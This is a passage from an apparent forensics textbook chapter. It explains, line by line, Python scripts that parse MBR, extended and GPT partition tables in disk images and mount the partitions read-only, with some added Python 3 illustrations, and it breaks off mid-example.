Next we check to see if the first byte in the partition entry is 0x80 which indicates the partition is active (bootable). Python, like many other languages, can treat strings as arrays. Also, like most languages, the indexes are zero-based. The == operator is used to check equality and the = operator is used for assignment. A single byte hexadecimal value in Python can be represented by a packed string containing a “\x” prefix. For example, '\x80' in our script means 0x80. Putting all of this together we see that the following lines set a class value called active to False and then reset the value to True if the first byte in a partition entry is 0x80. Note that Python uses indentation to determine what is run if the if statement evaluates to True.
self.active = False
# first byte == 0x80 means active (bootable)
if sector[offset] == '\x80':
    self.active = True
After interpreting the active flag, the MbrRecord constructor retrieves the partition type and stores it as a numerical value (not a packed string) on the line self.type = ord(sector[offset+4]). The construct ord(<single character>) is used to convert a packed string into an integer value. Next the type is checked for equality with zero. If it is zero, the class value of empty is set to True.
Finally, the starting and total sectors are extracted from the MBR and stored in appropriate class values. There is a lot happening in these two lines. It is easier to understand it if you break it down. We will start with the statement sector[offset + 8: offset + 12]. In Python parlance this is known as an array slice. An array is nothing but a list of values that are indexed with zero-based integers. So myArray[0] is the first item in myArray, myArray[1] is the second, etc. To specify a subarray (slice) in Python the syntax is myArray[<first index of slice>:<last index of slice + 1>]. For example, if myArray contains “This is the end, my one true friend!” then myArray[8:15] would be equal to “the end”.
The slices in these last two lines of the constructor contain 32-bit little endian integers in packed string format. If you are unfamiliar with the term little endian, it refers to how multi-byte values are stored in a computer. Nearly all computers you are likely to work with while doing forensics store values in little endian format which means bytes are stored from least to most significant. For example, the value 0xAABBCCDD would be stored as 0xDD 0xCC 0xBB 0xAA or '\xDD\xCC\xBB\xAA' in packed string format. The unpack function from the struct library is used to convert a packed string into a numerical value.
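The byte ordering described here is easy to confirm interactively. The short Python 3 sketch below packs the example value both ways and unpacks it again. The variable names are illustrative only.

```python
import struct

value = 0xAABBCCDD

# "<" asks for little endian: least significant byte first
little = struct.pack("<I", value)
# ">" asks for big endian: most significant byte first
big = struct.pack(">I", value)

print(little == b"\xdd\xcc\xbb\xaa")
print(big == b"\xaa\xbb\xcc\xdd")

# Reading little endian bytes with the wrong byte order gives a wrong value
wrong = struct.unpack(">I", little)[0]
print(hex(wrong))
```

Misreading the byte order of a starting sector is an easy way to end up with a mount offset that points nowhere useful, which is why the format string in the script always begins with “<”.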
Recall that the struct library was one of the imported libraries at the top of our script. In order for Python to find the functions from these imported libraries you must preface the function names with the library followed by a period. That is why the unpack function is called struct.unpack in our script. The unpack function takes a format string and a packed string as input. Our format string '<I' specifies an unsigned integer in little endian format. The format string input to the unpack function can contain more than one specifier which allows unpack to convert more than one value at a time. As a result, the unpack function returns an array. That is why you will find “[0]” on the end of these two lines as we only want the first item in the returned array (which should be the only item!). When you break it down, it is easy to see that self.start = struct.unpack('<I', sector[offset + 8: offset + 12])[0] gets a 4-byte packed string containing the starting sector in little endian format, converts it to a numeric value using unpack, and then stores the result in a class value named start.
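Because a format string can hold several specifiers, an entire 16-byte partition entry can be decoded with one call. The following Python 3 sketch is an alternative illustration and not how the script above is written. The function name parse_partition_entry and the dictionary keys are assumptions.

```python
import struct

# flag, 3 CHS bytes, type, 3 CHS bytes, start sector, sector count
ENTRY_FORMAT = "<B3sB3sII"


def parse_partition_entry(entry):
    """Decode one 16-byte MBR partition entry with a single unpack call."""
    flag, start_chs, ptype, end_chs, start, sectors = \
        struct.unpack(ENTRY_FORMAT, entry[:16])
    return {
        "active": flag == 0x80,
        "type": ptype,
        "start": start,
        "sectors": sectors,
    }
```

Here unpack returns six values at once, so there is no “[0]” on the end of the call. The CHS bytes are unpacked but left undecoded since they are essentially ignored on modern drives.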
The printPart function in MbrRecord is a little easier to understand than the constructor. First this function checks to see if the partition entry is empty; if so, it just prints “<empty>”. If it is not empty, whether or not it is bootable, its type, starting sector, and total sectors are displayed.
The script creates a usage function similar to what we have done with our shell scripts in the past. Note that this function is not indented and, therefore, not part of the MbrRecord class. The function does make use of the sys library that was imported in order to retrieve the name of this script using sys.argv[0] which is equivalent to $0 in our shell scripts.
We then define a main function. As with our shell scripts, we first check that an appropriate number of command line arguments are passed in, and, if not, display a usage message and exit. Note that the test here is for less than two command line arguments. There will always be one command line argument, the name of the script being run. In other words, if len(sys.argv) < 2: will only be true if you passed in no arguments.
Once we have verified that you passed in at least one argument, we check to see if the file really exists and is readable, displaying an error and exiting if it isn’t, in the following lines of code:
if not os.path.isfile(sys.argv[1]):
    print("File " + sys.argv[1] + " cannot be opened for reading")
    exit(1)
The next two lines might seem a bit strange if you are not a Python programmer (yet). This construct is the preferred way of opening and reading files in Python as it is succinct and ensures that your files will be closed cleanly. Even some readers who use Python might not be familiar with this method as it has been available for less than a decade, and I have seen some recently published Python books in forensics and information security still teaching people the old, non-preferred way of handling files. The two lines in question follow.
with open(sys.argv[1], 'rb') as f:
    sector = str(f.read(512))
To fully understand why this is a beautiful thing, you need to first understand how Python handles errors. Like many other languages, Python uses exceptions for error handling. At a high level exceptions work as follows. Any risky code that might generate an error (which is called throwing an exception) is enclosed in a try block. This try block is followed by one or more exception catching blocks that will process different errors (exception types). There is also an optional block, called a finally block, that is called every time the program exits the try block whether or not there was an error. The two lines above are roughly equivalent to the following:
f = None
try:
    f = open(sys.argv[1], 'rb')
    sector = str(f.read(512))
except Exception as e:
    print('An exception occurred: ' + str(e))
finally:
    # only close the file if open() actually succeeded
    if f is not None:
        f.close()
The file passed in to the script is opened as a read-only binary file because the 'rb' argument passed to open specifies the file mode. When the file is opened, a new file object named f is created. The read function of f is then called and the first 512 bytes (containing the MBR) are read. The MBR is converted to a string by enclosing f.read(512) inside str() and this string is stored in a variable named sector. Regardless of any errors, the file is closed cleanly before execution of the script proceeds.
Once the MBR has been read we do a sanity check. If the file is not corrupted or the wrong kind of file, the last two bytes should be 0x55 0xAA. This is the standard signature for an MBR or something called a Volume Boot Record (VBR). A VBR is a boot sector for a File Allocation Table (FAT) filesystem used by DOS and older versions of Windows. To distinguish between a VBR and MBR we check the first byte for each MBR partition entry and verify that each is either 0x80 or 0x00. If all four entries check out, we proceed under the assumption that it is an MBR. Otherwise we assume it is a VBR and mount the only partition straight away.
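The sanity check can be pulled out into a small function of its own, which makes it easy to test against known sectors. This sketch is written for Python 3, where a sector read in binary mode is a bytes object and each indexed byte is already an integer. The function name classify_boot_sector and the returned strings are assumptions for illustration.

```python
def classify_boot_sector(sector):
    """Return "MBR", "VBR", or "unknown" for the first sector of an image."""
    if len(sector) < 512 or sector[510:512] != b"\x55\xaa":
        return "unknown"
    # the active flag is the first byte of each of the four 16-byte entries
    flags = [sector[446 + 16 * slot] for slot in range(4)]
    if all(flag in (0x00, 0x80) for flag in flags):
        return "MBR"
    return "VBR"
```

This is the same heuristic the script uses, so it shares the same limitation: a VBR that happens to contain 0x00 or 0x80 at all four offsets would be mistaken for an MBR.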
The line
parts = [MbrRecord(sector, 0), MbrRecord(sector, 1), \
    MbrRecord(sector, 2), MbrRecord(sector, 3)]
creates a list containing the four partition entries. Notice that I said line not lines. The “\” at the end of the first line is a line continuation character. This is used to make things more readable without violating Python’s indentation rules.
At this point I must confess to a white lie I told earlier in this chapter. Python does not have arrays. Rather, Python has two things that look like arrays: lists and tuples. To create a list in Python simply enclose the list items in square brackets and separate them with commas. The list we have described here is mutable (its values can be changed). Enclosing items in parentheses creates a tuple which is used in the same way, but is immutable. Some readers may be familiar with arrays in other languages. Unlike arrays, items in a list or tuple can be of different types in Python.
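The difference between the two is quickly demonstrated. The following Python 3 sketch uses made-up values, and the variable names are illustrative only.

```python
# A list is mutable and may hold items of different types
mixed = [0x83, "swap", 3.5]
mixed[0] = 0x82          # replacing an item is allowed
mixed.append(None)       # and so is growing the list

# A tuple is indexed the same way but cannot be changed
extended_types = (0x05, 0x85)
first = extended_types[0]

try:
    extended_types[0] = 0x0F
    tuple_changed = True
except TypeError:
    # Python refuses to assign to an item of a tuple
    tuple_changed = False
```

A tuple is a reasonable choice for a fixed collection such as a set of partition type codes that should never be altered while a script is running.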
Once we have the list of partitions, we iterate over the list in the following for loop:
for p in parts:
    p.printPart()
    if not p.empty:
        notsupParts = [0x05, 0x0f, 0x85, 0x91, 0x9b, 0xc5, 0xe4, 0xee]
        if p.type in notsupParts:
            print("Sorry GPT and extended partitions " + \
                "are not supported by this script!")
        else:
            mountpath = '/media/part%s' % str(p.partno)
            # if the appropriate directory doesn't exist create it
            if not os.path.isdir(mountpath):
                subprocess.call(['mkdir', mountpath])
            mountopts = 'loop,ro,noatime,offset=%s' % str(p.start * 512)
            subprocess.call(['mount', '-o', mountopts, sys.argv[1], mountpath])
Let's break down this for loop. The line for p in parts: starts a for loop block. This causes the Python interpreter to iterate over the parts list setting the variable p to point to the current item in parts with each iteration. We start by printing out the partition entry using p.printPart(). If the entry is not empty we proceed with our attempts to mount it.
We create another list, notsupParts, and fill it with partition types that are not supported by this script. Next, we check to see if the current partition's type is in the list with if p.type in notsupParts:. If it is in the list, we print a sorry message. Otherwise (else:) we continue with our mounting process.
The line mountpath = '/media/part%s' % str(p.partno) uses a popular Python construct to build a string. The general format of this construct is "some string containing placeholders" % <single value or tuple of values>. For example, 'Hello %s, My name is %s' % ('Bob', 'Phil') would evaluate to the string 'Hello Bob, My name is Phil'. The line in our code causes mountpath to be assigned the value of '/media/part0', '/media/part1', '/media/part2', or '/media/part3'.
The line if not os.path.isdir(mountpath): checks for the existence of this mountpath directory. If it doesn't exist it is created on the next line. The next line uses subprocess.call() to call an external program or command. This function expects a list containing the program to be run and any arguments.
On the next line the string substitution construct is used once again to create a string with options for the mount command complete with the appropriate offset. Note that str(p.start * 512) is used to first compute this offset and then convert it from a numeric value to a string for substitution by the % operator. Finally, we use subprocess.call() to run the mount command.
Only one thing remains in the script that requires explanation, and that is the last two lines. The test if __name__ == "__main__": is a common trick used in Python scripting. If the script is executed the variable __name__ is set to "__main__". If, however, the script is merely imported, __name__ is set to the name of the module instead, so the test fails and main() is not called. This allows the creation of Python scripts that can both be run and imported into other scripts (thereby allowing code to be reused).
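The behavior of __name__ can be checked directly. The sketch below, written for Python 3, writes a one-line throwaway module to a temporary directory, then both runs it as a script and imports it. The module name demo_mod and the variable seen_name are hypothetical names chosen for this illustration.

```python
import importlib.util
import os
import runpy
import tempfile

SOURCE = "seen_name = __name__\n"

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "demo_mod.py")
    with open(path, "w") as f:
        f.write(SOURCE)

    # Execute the file the way "python demo_mod.py" would.
    run_globals = runpy.run_path(path, run_name="__main__")
    name_when_run = run_globals["seen_name"]

    # Import the same file as a module named demo_mod.
    spec = importlib.util.spec_from_file_location("demo_mod", path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    name_when_imported = module.seen_name

print(name_when_run)
print(name_when_imported)
```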
If you are new to Python you might want to take a break at this point after walking through our first script. You might want to reread this section if you are still a bit uncertain about how this script works. Rest assured that things will be a bit easier as we press on and develop new scripts.
The results of running our script against an image file from a Windows system are shown in Figure 5.12. Figure 5.13 depicts what happens when running the script against an image from an Ubuntu 14.04 system.
FIGURE 5.12
Running the Python mounting script against an image file from a Windows system.
FIGURE 5.13
Running the Python mounting script against an image file from an Ubuntu 14.04 system.
MBR-based extended partitions
The following script will attempt to mount anything in extended partitions that were skipped over in the previous script:
#!/usr/bin/python
#
# mount-image-extpart.py
#
# This is a simple Python script that will
# attempt to mount partitions inside an extended
# partition from an image file.
# Images are mounted read-only.
#
# Developed by Dr. Phil Polstra (@ppolstra)
# for PentesterAcademy.com
import sys
import os.path
import subprocess
import struct
"""
Class MbrRecord: decodes a partition record from a Master Boot Record
Usage: rec = MbrRecord(sector, partno) where
    sector is the 512 byte or greater sector containing the MBR
    partno is the partition number 0-3 of interest
    rec.printPart() prints partition information
"""
class MbrRecord():
    def __init__(self, sector, partno):
        self.partno = partno
        # first record at offset 446 & records are 16 bytes
        offset = 446 + partno * 16
        self.active = False
        # first byte == 0x80 means active (bootable)
        if sector[offset] == '\x80':
            self.active = True
        self.type = ord(sector[offset+4])
        self.empty = False
        # partition type == 0 means it is empty
        if self.type == 0:
            self.empty = True
        # sector values are 32-bit and stored in little endian format
        self.start = struct.unpack('<I', sector[offset + 8: \
            offset + 12])[0]
        self.sectors = struct.unpack('<I', sector[offset + 12: \
            offset + 16])[0]
    def printPart(self):
        if self.empty == True:
            print("<empty>")
        else:
            outstr = ""
            if self.active == True:
                outstr += "Bootable:"
            outstr += "Type " + str(self.type) + ":"
            outstr += "Start " + str(self.start) + ":"
            outstr += "Total sectors " + str(self.sectors)
            print(outstr)
def usage():
    print("usage " + sys.argv[0] + " <image file>\n" + \
        "Attempts to mount extended partitions from an image file")
    exit(1)
def main():
    if len(sys.argv) < 2:
        usage()
    # only extended partitions will be processed
    extParts = [0x05, 0x0f, 0x85, 0x91, 0x9b, 0xc5, 0xe4]
    # swap partitions will be ignored
    swapParts = [0x42, 0x82, 0xb8, 0xc3, 0xfc]
    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    with open(sys.argv[1], 'rb') as f:
        sector = str(f.read(512))
    if (sector[510] == "\x55" and sector[511] == "\xaa"):
        print("Looks like a MBR or VBR")
        # if it is an MBR bytes 446, 462, 478, and 494 must be 0x80 or 0x00
        if (sector[446] == '\x80' or sector[446] == '\x00') and \
            (sector[462] == '\x80' or sector[462] == '\x00') and \
            (sector[478] == '\x80' or sector[478] == '\x00') and \
            (sector[494] == '\x80' or sector[494] == '\x00'):
            print("Must be a MBR")
            parts = [MbrRecord(sector, 0), MbrRecord(sector, 1), \
                MbrRecord(sector, 2), MbrRecord(sector, 3)]
            for p in parts:
                p.printPart()
                if not p.empty:
                    # if it isn't an extended partition ignore it
                    if p.type in extParts:
                        print("Found an extended partition at sector %s" \
                            % str(p.start))
                        bottomOfRabbitHole = False
                        extendPartStart = p.start
                        extPartNo = 5
                        while not bottomOfRabbitHole:
                            # get the linked list MBR entry
                            with open(sys.argv[1], 'rb') as f:
                                f.seek(extendPartStart * 512)
                                llSector = str(f.read(512))
                            extParts = [MbrRecord(llSector, 0),
                                MbrRecord(llSector, 1)]
                            # try and mount the first partition
                            if extParts[0].type in swapParts:
                                print("Skipping swap partition")
                            else:
                                mountpath = '/media/part%s' % str(extPartNo)
                                if not os.path.isdir(mountpath):
                                    subprocess.call(['mkdir', mountpath])
                                mountopts = 'loop,ro,noatime,offset=%s' \
                                    % str((extParts[0].start + extendPartStart) * 512)
                                print("Attempting to mount extend part type %s at sector %s" \
                                    % (hex(extParts[0].type), \
                                    str(extendPartStart + extParts[0].start)))
                                subprocess.call(['mount', '-o', mountopts, \
                                    sys.argv[1], mountpath])
                            if extParts[1].type == 0:
                                bottomOfRabbitHole = True
                                print("Found the bottom of the rabbit hole")
                            else:
                                extendPartStart += extParts[1].start
                                extPartNo += 1
if __name__ == "__main__":
    main()
This script starts out very similar to the previous script until we get into the main function. The first difference is the definition of two lists: extParts and swapParts that list extended partition and swap partition types, respectively. We then read the MBR as before and verify that it looks like an MBR should. Things really start to diverge from the previous script at the following lines:
if p.type in extParts:
    print("Found an extended partition at sector %s" \
        % str(p.start))
    bottomOfRabbitHole = False
    extendPartStart = p.start
    extPartNo = 5
In these lines we check to see if we have found an extended partition. If so we print a message and set a few variables. The first variable named bottomOfRabbitHole is set to False. This variable is used to indicate when we have found the lowest level in a set of nested extended partitions. The start sector of the primary extended partition is stored in extendPartStart. This is necessary because addresses inside an extended partition are relative to the extended partition, but we need absolute addresses to mount the partition(s). Finally, we set a variable extPartNo equal to 5 which is traditionally used as the partition number for the first logical partition within an extended partition.
The line while not bottomOfRabbitHole: begins a while loop. A while loop is executed as long as the condition listed in the while loop is true. Within the while loop we use our with open construct as before to read the mini-MBR at the start of the extended partition with one small addition to the previous script. The line f.seek(extendPartStart * 512) is new. Because the mini-MBR is not located at the start of the file (LBA 0) we must seek ahead to the appropriate place. The offset we need is just the sector number multiplied by the size of a sector (512).
Next we read the first two entries in the mini-MBR into a list, extParts. If the first entry (extParts[0]) is a swap partition, we skip it. Otherwise we attempt to mount it. The mounting code is the same as that found in the previous script.
We then check the second entry in the mini-MBR (extParts[1]). If its type is 0x00, there are no nested extended partitions and we are done. If this is not the case we add the starting sector of the nested extended partition to extendPartStart and increment extPartNo so things are set up properly for our next iteration of the while loop.
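To experiment with the linked list of mini-MBRs without a disk image, the chain can be walked over an in-memory buffer. The following Python 3 sketch is an illustration only, and the helper names (parse_entry, walk_logical_partitions, make_ebr) and the synthetic image are assumptions, not code from this chapter. It also makes one assumption that differs from the listing above: the link entry (the second entry) is treated as relative to the start of the primary extended partition, which is the usual on-disk convention, whereas the first entry is relative to the mini-MBR that contains it. For a chain with only one link the two approaches give the same result.

```python
import struct

SECTOR = 512

def parse_entry(sector, index):
    """Return (type, start, count) for entry `index` of an MBR-style sector."""
    offset = 446 + 16 * index
    ptype = sector[offset + 4]
    start, count = struct.unpack("<II", sector[offset + 8:offset + 16])
    return ptype, start, count

def walk_logical_partitions(image, ext_start):
    """Yield (number, type, absolute start sector) for each logical partition."""
    ebr_start = ext_start
    number = 5
    seen = set()
    while ebr_start not in seen:          # guard against a looping chain
        seen.add(ebr_start)
        ebr = image[ebr_start * SECTOR:(ebr_start + 1) * SECTOR]
        if len(ebr) < SECTOR or ebr[510:512] != b"\x55\xaa":
            break
        ptype, rel_start, _ = parse_entry(ebr, 0)
        if ptype != 0:
            # first entry: relative to the mini-MBR that holds it
            yield number, ptype, ebr_start + rel_start
            number += 1
        link_type, link_start, _ = parse_entry(ebr, 1)
        if link_type == 0:
            break                          # bottom of the rabbit hole
        # link entry: assumed relative to the primary extended partition
        ebr_start = ext_start + link_start

def make_ebr(first, link):
    """Build a synthetic mini-MBR from two (type, start, count) tuples."""
    sector = bytearray(SECTOR)
    for i, (ptype, start, count) in enumerate((first, link)):
        offset = 446 + 16 * i
        sector[offset + 4] = ptype
        sector[offset + 8:offset + 16] = struct.pack("<II", start, count)
    sector[510:512] = b"\x55\xaa"
    return bytes(sector)

# Hypothetical 64-sector image with an extended partition at sector 10.
image = bytearray(64 * SECTOR)
image[10 * SECTOR:11 * SECTOR] = make_ebr((0x83, 2, 8), (0x05, 20, 10))
image[30 * SECTOR:31 * SECTOR] = make_ebr((0x82, 2, 8), (0x05, 40, 10))
image[50 * SECTOR:51 * SECTOR] = make_ebr((0x83, 2, 8), (0x00, 0, 0))

found = list(walk_logical_partitions(bytes(image), 10))
for number, ptype, start in found:
    print(number, hex(ptype), start)
```

Multiplying each absolute start sector by 512 gives the offset value that would be passed to mount.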
GPT partitions
Now that we have covered systems using the legacy MBR-based method of partitioning, let's move on to GUID-based partitions. Hopefully within the next few years this will become the only system you have to handle during your investigations. As I said previously, this new system is much more straightforward and elegant. Our script for automatically mounting these partitions follows.
#!/usr/bin/python
#
# mount-image-gpt.py
#
# This is a simple Python script that will
# attempt to mount partitions from an image file.
# This script is for GUID partitions only.
# Images are mounted read-only.
#
# Developed by Dr. Phil Polstra (@ppolstra)
# for PentesterAcademy.com
import sys
import os.path
import subprocess
import struct
# GUIDs for supported partition types
supportedParts = ["EBD0A0A2-B9E5-4433-87C0-68B6B72699C7",
    "37AFFC90-EF7D-4E96-91C3-2D7AE055B174",
    "0FC63DAF-8483-4772-8E79-3D69D8477DE4",
    "8DA63339-0007-60C0-C436-083AC8230908",
    "933AC7E1-2EB4-4F13-B844-0E14E2AEF915",
    "44479540-F297-41B2-9AF7-D131D5F0458A",
    "4F68BCE3-E8CD-4DB1-96E7-FBCAF984B709",
    "B921B045-1DF0-41C3-AF44-4C6F280D3FAE",
    "3B8F8425-20E0-4F3B-907F-1A25A76F98E8",
    "E6D6D379-F507-44C2-A23C-238F2A3DF928",
    "516E7CB4-6ECF-11D6-8FF8-00022D09712B",
    "83BD6B9D-7F41-11DC-BE0B-001560B84F0F",
    "516E7CB5-6ECF-11D6-8FF8-00022D09712B",
    "85D5E45A-237C-11E1-B4B3-E89A8F7FC3A7",
    "516E7CB4-6ECF-11D6-8FF8-00022D09712B",
    "824CC7A0-36A8-11E3-890A-952519AD3F61",
    "55465300-0000-11AA-AA11-00306543ECAC",
    "516E7CB4-6ECF-11D6-8FF8-00022D09712B",
    "49F48D5A-B10E-11DC-B99B-0019D1879648",
    "49F48D82-B10E-11DC-B99B-0019D1879648",
    "2DB519C4-B10F-11DC-B99B-0019D1879648",
    "2DB519EC-B10F-11DC-B99B-0019D1879648",
    "49F48DAA-B10E-11DC-B99B-0019D1879648",
    "426F6F74-0000-11AA-AA11-00306543ECAC",
    "48465300-0000-11AA-AA11-00306543ECAC",
    "52414944-0000-11AA-AA11-00306543ECAC",
    "52414944-5F4F-11AA-AA11-00306543ECAC",
    "4C616265-6C00-11AA-AA11-00306543ECAC",
    "6A82CB45-1DD2-11B2-99A6-080020736631",
    "6A85CF4D-1DD2-11B2-99A6-080020736631",
    "6A898CC3-1DD2-11B2-99A6-080020736631",
    "6A8B642B-1DD2-11B2-99A6-080020736631",
    "6A8EF2E9-1DD2-11B2-99A6-080020736631",
    "6A90BA39-1DD2-11B2-99A6-080020736631",
    "6A9283A5-1DD2-11B2-99A6-080020736631",
    "75894C1E-3AEB-11D3-B7C1-7B03A0000000",
    "E2A1E728-32E3-11D6-A682-7B03A0000000",
    "BC13C2FF-59E6-4262-A352-B275FD6F7172",
    "42465331-3BA3-10F1-802A-4861696B7521",
    "AA31E02A-400F-11DB-9590-000C2911D1B8",
    "9198EFFC-31C0-11DB-8F78-000C2911D1B8",
    "9D275380-40AD-11DB-BF97-000C2911D1B8",
    "A19D880F-05FC-4D3B-A006-743F0F84911E"]
# simple helper to print GUIDs
# note that they are both little/big endian
def printGuid(packedString):
    if len(packedString) == 16:
        outstr = format(struct.unpack('<L', \
            packedString[0:4])[0], 'X').zfill(8) + "-" + \
            format(struct.unpack('<H', \
            packedString[4:6])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('<H', \
            packedString[6:8])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>H', \
            packedString[8:10])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>Q', \
            "\x00\x00" + packedString[10:16])[0], 'X').zfill(12)
    else:
        outstr = "<invalid>"
    return outstr
"""
Class GptRecord
Parses a GUID Partition Table entry
Usage: rec = GptRecord(recs, partno)
    where recs is a string containing all 128 GPT entries
    and partno is the partition number (0-127) of interest
    rec.printPart() prints partition information
"""
class GptRecord():
    def __init__(self, recs, partno):
        self.partno = partno
        offset = partno * 128
        self.empty = False
        # build partition type GUID string
        self.partType = printGuid(recs[offset:offset+16])
        if self.partType == \
            "00000000-0000-0000-0000-000000000000":
            self.empty = True
        self.partGUID = printGuid(recs[offset+16:offset+32])
        self.firstLBA = struct.unpack('<Q', \
            recs[offset+32:offset+40])[0]
        self.lastLBA = struct.unpack('<Q', \
            recs[offset+40:offset+48])[0]
        self.attr = struct.unpack('<Q', \
            recs[offset+48:offset+56])[0]
        nameIndex = recs[offset+56:offset+128].find('\x00\x00')
        if nameIndex != -1:
            self.partName = \
                recs[offset+56:offset+56+nameIndex].encode('utf-8')
        else:
            self.partName = \
                recs[offset+56:offset+128].encode('utf-8')
    def printPart(self):
        if not self.empty:
            outstr = str(self.partno) + ":" + self.partType + \
                ":" + self.partGUID + ":" + str(self.firstLBA) + \
                ":" + str(self.lastLBA) + ":" + \
                str(self.attr) + ":" + self.partName
            print(outstr)
"""
Class MbrRecord: decodes a partition record from a Master Boot Record
Usage: rec = MbrRecord(sector, partno) where
    sector is the 512 byte or greater sector containing the MBR
    partno is the partition number 0-3 of interest
    rec.printPart() prints partition information
"""
class MbrRecord():
    def __init__(self, sector, partno):
        self.partno = partno
        # first record at offset 446 & records are 16 bytes
        offset = 446 + partno * 16
        self.active = False
        # first byte == 0x80 means active (bootable)
        if sector[offset] == '\x80':
            self.active = True
        self.type = ord(sector[offset+4])
        self.empty = False
        # partition type == 0 means it is empty
        if self.type == 0:
            self.empty = True
        # sector values are 32-bit and stored in little endian format
        self.start = struct.unpack('<I', sector[offset + 8: \
            offset + 12])[0]
        self.sectors = struct.unpack('<I', sector[offset + 12: \
            offset + 16])[0]
    def printPart(self):
        if self.empty == True:
            print("<empty>")
        else:
            outstr = ""
            if self.active == True:
                outstr += "Bootable:"
            outstr += "Type " + str(self.type) + ":"
            outstr += "Start " + str(self.start) + ":"
            outstr += "Total sectors " + str(self.sectors)
            print(outstr)
def usage():
    print("usage " + sys.argv[0] + \
        " <image file>\nAttempts to mount partitions from an image file")
    exit(1)
def main():
    if len(sys.argv) < 2:
        usage()
    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    with open(sys.argv[1], 'rb') as f:
        sector = str(f.read(512))
    if (sector[510] == "\x55" and sector[511] == "\xaa"):
        # if it is an MBR bytes 446, 462, 478, and 494 must be 0x80 or 0x00
        if (sector[446] == '\x80' or sector[446] == '\x00') and \
            (sector[462] == '\x80' or sector[462] == '\x00') and \
            (sector[478] == '\x80' or sector[478] == '\x00') and \
            (sector[494] == '\x80' or sector[494] == '\x00'):
            part = MbrRecord(sector, 0)
            if part.type != 0xee:
                print("Failed protective MBR sanity check")
                exit(1)
    # check the header as another sanity check
    with open(sys.argv[1], 'rb') as f:
        f.seek(512)
        sector = str(f.read(512))
    if sector[0:8] != "EFI PART":
        print("You appear to be missing a GPT header")
        exit(1)
    print("Valid protective MBR and GPT partition table header found")
    with open(sys.argv[1], 'rb') as f:
        f.seek(1024)
        partRecs = str(f.read(512 * 32))
    parts = []
    for i in range(0, 128):
        p = GptRecord(partRecs, i)
        if not p.empty:
            p.printPart()
            parts.append(p)
    for p in parts:
        if p.partType in supportedParts:
            print("Partition %s seems to be supported attempting to mount" \
                % str(p.partno))
            mountpath = '/media/part%s' % str(p.partno)
            if not os.path.isdir(mountpath):
                subprocess.call(['mkdir', mountpath])
            mountopts = 'loop,ro,noatime,offset=%s' % \
                str(p.firstLBA * 512)
            subprocess.call(['mount', '-o', mountopts, \
                sys.argv[1], mountpath])
if __name__ == "__main__":
    main()
Let's walk through this code. It begins with the normal she-bang. Then we import the same four libraries as in the previous scripts. Next we define a very long list of supported partition types. As you can see from this list, Linux supports most any partition type.
We define a simple helper function to print the GUIDs from the packed strings used to store the GPT entries on these lines:
def printGuid(packedString):
    if len(packedString) == 16:
        outstr = format(struct.unpack('<L', \
            packedString[0:4])[0], 'X').zfill(8) + "-" + \
            format(struct.unpack('<H', \
            packedString[4:6])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('<H', \
            packedString[6:8])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>H', \
            packedString[8:10])[0], 'X').zfill(4) + "-" + \
            format(struct.unpack('>Q', \
            "\x00\x00" + packedString[10:16])[0], 'X').zfill(12)
    else:
        outstr = "<invalid>"
    return outstr
This helper function uses the same struct.unpack method found in the previous scripts. One difference is that the first three parts of the GUID are stored in little endian format and the last two are big endian. That is why the first three calls to struct.unpack have '<' in their format strings and the last two have '>'. Also, the last call to unpack might look a bit strange. All that I've done here is add two bytes of leading zeros to the value because there is no unpack format specifier for a 6-byte value, but there is one for an 8-byte value.
We have introduced a new function, format, in this helper function. As the name implies, format is used to print values in a specified way. Our chosen format, 'X', specifies hexadecimal with uppercase letters. Once we have a string containing our value we run zfill() on the string to add leading zeros in order for our GUIDs to print correctly. As a simple example, the expression format(struct.unpack('<L', '\x04\x00\x00\x00')[0], 'X').zfill(8) evaluates to the string "00000004".
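The mixed endian layout can be checked against Python's standard uuid module, whose bytes_le form describes the same byte order. The sketch below is a Python 3 illustration rather than a replacement for printGuid; the function name format_guid is an assumption made for the example, and the sample bytes are the on-disk form of the Linux filesystem type GUID that appears in the supportedParts list.

```python
import struct
import uuid

def format_guid(raw):
    """Format 16 raw GPT bytes as an uppercase GUID string."""
    if len(raw) != 16:
        return "<invalid>"
    # The first three fields are little endian.
    d1, d2, d3 = struct.unpack("<IHH", raw[0:8])
    # The last two fields are big endian.
    (d4,) = struct.unpack(">H", raw[8:10])
    d5 = int.from_bytes(raw[10:16], "big")   # 6-byte value, no padding needed
    return "%08X-%04X-%04X-%04X-%012X" % (d1, d2, d3, d4, d5)

raw = bytes.fromhex("AF3DC60F838472478E793D69D8477DE4")
by_hand = format_guid(raw)
via_uuid = str(uuid.UUID(bytes_le=raw)).upper()

print(by_hand)
print(via_uuid)
```

Both approaches should print the same string; using uuid.UUID(bytes_le=...) is simply a shorter route to the same result in Python 3.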
Next we define a GptRecord class that acts just like the MbrRecord class from the previous scripts. It expects a string containing the partition table entries (all 128 of them) and an index into the table as inputs. Only the following lines require any explanation in this class:
nameIndex = recs[offset+56:offset+128].find('\x00\x00')
if nameIndex != -1:
    self.partName = \
        recs[offset+56:offset+56+nameIndex].encode('utf-8')
else:
    self.partName = \
        recs[offset+56:offset+128].encode('utf-8')
Why are these lines here? I have found that sometimes Unicode strings such as those used to store the partition name in the GPT are null-terminated (with 0x00 0x00) and there may be random junk after the terminating null character. The first line in this code fragment uses find to see if there is a null character in the name. If the string is found, then nameIndex is set to its position. If the string is not found, the find function returns -1. Looking at the if block you will see that if a null was found, we only use characters before it to store the partition name. Otherwise we store all of the name.
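In Python 3 the same idea can be expressed by decoding the name field first and then cutting at the first null character, which avoids matching a pair of zero bytes that straddles two characters. This is a sketch under the assumption that the name field is UTF-16 little endian; the function name decode_partition_name and the sample field contents are invented for the illustration.

```python
def decode_partition_name(raw):
    """Decode a GPT name field, stopping at the first null character."""
    text = raw.decode("utf-16-le", errors="replace")
    return text.split("\x00", 1)[0]

# Hypothetical 72-byte name field: a name, a terminator, then junk.
field = "Linux data".encode("utf-16-le") + b"\x00\x00" + b"\xff\x41junk"
field = field.ljust(72, b"\x00")

# A field with no terminator at all uses every character.
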